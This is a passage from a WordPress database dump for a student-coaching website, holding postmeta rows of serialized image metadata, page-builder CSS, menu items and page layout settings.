s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-30-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-30-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-30-450x225.png\";s:5:\"width\";i:450;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-30-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1441,2048,'_wp_attached_file','2020/10/Untitled-design-31.png'),(1442,2048,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:300;s:4:\"file\";s:30:\"2020/10/Untitled-design-31.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-31-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-31-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-31-450x225.png\";s:5:\"width\";i:450;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-31-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1443,2049,'_wpb_shortcodes_custom_css','.vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}.vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}.vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}.vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759211052{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1444,7,'_edit_lock','1604627420:1'),(1445,7,'page_layout','fullwidth'),(1446,7,'page_sidebar','default_sidebar'),(1447,7,'page_width','fullwidth'),(1448,7,'navbar_style','default'),(1449,7,'navbar_color','default'),(1450,7,'footer_color','default'),(1451,7,'page_header','default'),(1452,7,'page_subtitle',''),(1453,7,'footer_widgets','default'),(1454,7,'slide_template','default'),(1455,7,'rs_page_bg_color','#ffffff'),(1456,7,'_wpb_vc_js_status','true'),(1457,7,'_edit_last','1'),(1458,7,'_wp_page_template','default'),(1459,2052,'_wp_attached_file','2020/10/121A4544-scaled-e1603901915529.jpg'),(1460,2052,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1285;s:6:\"height\";i:1444;s:4:\"file\";s:42:\"2020/10/121A4544-scaled-e1603901915529.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-267x300.jpg\";s:5:\"width\";i:267;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:43:\"121A4544-scaled-e1603901915529-911x1024.jpg\";s:5:\"width\";i:911;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-768x863.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:863;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"121A4544-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"121A4544-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"121A4544-1670x1113.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:43:\"121A4544-scaled-e1603901915529-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-880x989.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:989;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-450x506.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:506;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901915529-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1581450333\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"121A4544.jpg\";}'),(1461,2052,'_edit_lock','1603901781:1'),(1462,2052,'_wp_attachment_backup_sizes','a:27:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:19:\"121A4544-scaled.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:21:\"121A4544-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:22:\"121A4544-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:22:\"121A4544-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"bg-image-orig\";a:4:{s:4:\"file\";s:22:\"121A4544-1670x1113.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"fullwidth-landscape-orig\";a:4:{s:4:\"file\";s:21:\"121A4544-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"sidebar-landscape-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-auto-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-880x587.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"portfolio-square-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"portfolio-auto-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"square-orig\";a:4:{s:4:\"file\";s:20:\"121A4544-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"full-1603901915529\";a:3:{s:5:\"width\";i:1286;s:6:\"height\";i:1452;s:4:\"file\";s:34:\"121A4544-scaled-e1603901795654.jpg\";}s:23:\"thumbnail-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"medium-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-266x300.jpg\";s:5:\"width\";i:266;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"medium_large-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-768x867.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"large-1603901915529\";a:4:{s:4:\"file\";s:43:\"121A4544-scaled-e1603901795654-907x1024.jpg\";s:5:\"width\";i:907;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"post-thumbnail-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:33:\"fullwidth-landscape-1603901915529\";a:4:{s:4:\"file\";s:43:\"121A4544-scaled-e1603901795654-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"sidebar-landscape-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"sidebar-auto-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-880x994.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:994;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"portfolio-square-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"portfolio-auto-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-450x508.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"square-1603901915529\";a:4:{s:4:\"file\";s:42:\"121A4544-scaled-e1603901795654-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(1463,2052,'_edit_last','1'),(1464,2052,'_wp_page_template','default'),(1628,2115,'text_invalid_email','Please provide a valid email address.'),(1567,2087,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:828;s:6:\"height\";i:451;s:4:\"file\";s:25:\"2020/10/testimonial-4.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"testimonial-4-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"testimonial-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"testimonial-4-768x418.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:418;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"testimonial-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:25:\"testimonial-4-828x380.jpg\";s:5:\"width\";i:828;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:25:\"testimonial-4-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:25:\"testimonial-4-450x245.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:25:\"testimonial-4-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1566,2087,'_wp_attached_file','2020/10/testimonial-4.jpg'),(1608,8,'_wpb_vc_js_status','true'),(1607,8,'rs_page_bg_color','#ffffff'),(1606,8,'slide_template','default'),(1605,8,'footer_widgets','default'),(1604,8,'page_subtitle',''),(1603,8,'page_header','default'),(1602,8,'footer_color','default'),(1486,2061,'_menu_item_type','custom'),(1487,2061,'_menu_item_menu_item_parent','0'),(1488,2061,'_menu_item_object_id','2061'),(1489,2061,'_menu_item_object','custom'),(1490,2061,'_menu_item_target',''),(1491,2061,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1492,2061,'_menu_item_xfn',''),(1493,2061,'_menu_item_url','http://highperformingstudent.com/speaking'),(1601,8,'navbar_color','default'),(1600,8,'navbar_style','default'),(1599,8,'page_width','fullwidth'),(1598,8,'page_sidebar','default_sidebar'),(1597,8,'page_layout','fullwidth'),(1596,8,'_edit_lock','1603932253:1'),(1504,2063,'_menu_item_type','custom'),(1505,2063,'_menu_item_menu_item_parent','0'),(1506,2063,'_menu_item_object_id','2063'),(1507,2063,'_menu_item_object','custom'),(1508,2063,'_menu_item_target',''),(1509,2063,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1510,2063,'_menu_item_xfn',''),(1511,2063,'_menu_item_url','http://highperformingstudent.com/results'),(1627,2115,'text_subscribed','Thank you, your waitlist request was successful! Please check your email inbox to confirm.'),(1519,2071,'_wpb_shortcodes_custom_css','.vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}.vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}.vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}.vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759211052{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1520,2073,'_edit_lock','1603930015:1'),(1521,2073,'_edit_last','1'),(1522,2073,'_wp_page_template','default'),(1523,2073,'page_layout','fullwidth'),(1524,2073,'page_sidebar','default_sidebar'),(1525,2073,'page_width','fullwidth'),(1526,2073,'navbar_style','default'),(1527,2073,'navbar_color','default'),(1528,2073,'footer_color','default'),(1529,2073,'page_header','default'),(1530,2073,'page_subtitle',''),(1531,2073,'footer_widgets','default'),(1532,2073,'slide_template','default'),(1533,2073,'rs_page_bg_color','#ffffff'),(1534,2073,'_wpb_vc_js_status','true'),(1535,2074,'_wpb_shortcodes_custom_css','.vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1536,2075,'_wpb_shortcodes_custom_css','.vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1537,2076,'_wpb_shortcodes_custom_css','.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1538,2077,'_wpb_shortcodes_custom_css','.vc_custom_1603924173908{background-color: #ffffff !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1539,2078,'_wpb_shortcodes_custom_css','.vc_custom_1603924232901{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #ffffff !important;}.vc_custom_1603924201644{background-color: #ffffff !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1540,2079,'_wpb_shortcodes_custom_css','.vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}.vc_custom_1603924201644{background-color: #ffffff !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1541,2073,'_wpb_shortcodes_custom_css','.vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}.vc_custom_1603929990399{padding-top: 30px !important;background-color: #000000 !important;}.vc_custom_1603924201644{background-color: #ffffff !important;}.vc_custom_1603929402169{padding-top: 40px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1603924765880{margin-bottom: -250px !important;}'),(1542,2081,'_wp_attached_file','2020/10/Untitled-design-27-2.png'),(1543,2081,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:426;s:6:\"height\";i:578;s:4:\"file\";s:32:\"2020/10/Untitled-design-27-2.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-2-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-2-426x500.png\";s:5:\"width\";i:426;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-2-426x380.png\";s:5:\"width\";i:426;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-2-426x350.png\";s:5:\"width\";i:426;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-2-426x450.png\";s:5:\"width\";i:426;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1544,2080,'_wpb_shortcodes_custom_css','.vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}.vc_custom_1603929990399{padding-top: 30px !important;background-color: #000000 !important;}.vc_custom_1603924201644{background-color: #ffffff !important;}.vc_custom_1603929402169{padding-top: 40px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1603924765880{margin-bottom: -250px !important;}'),(1545,2082,'_wp_attached_file','2020/10/Screen-Shot-2020-10-28-at-6.38.58-PM.png'),(1546,2082,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:784;s:6:\"height\";i:1066;s:4:\"file\";s:48:\"2020/10/Screen-Shot-2020-10-28-at-6.38.58-PM.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2020-10-28-at-6.38.58-PM-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2020-10-28-at-6.38.58-PM-753x1024.png\";s:5:\"width\";i:753;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2020-10-28-at-6.38.58-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2020-10-28-at-6.38.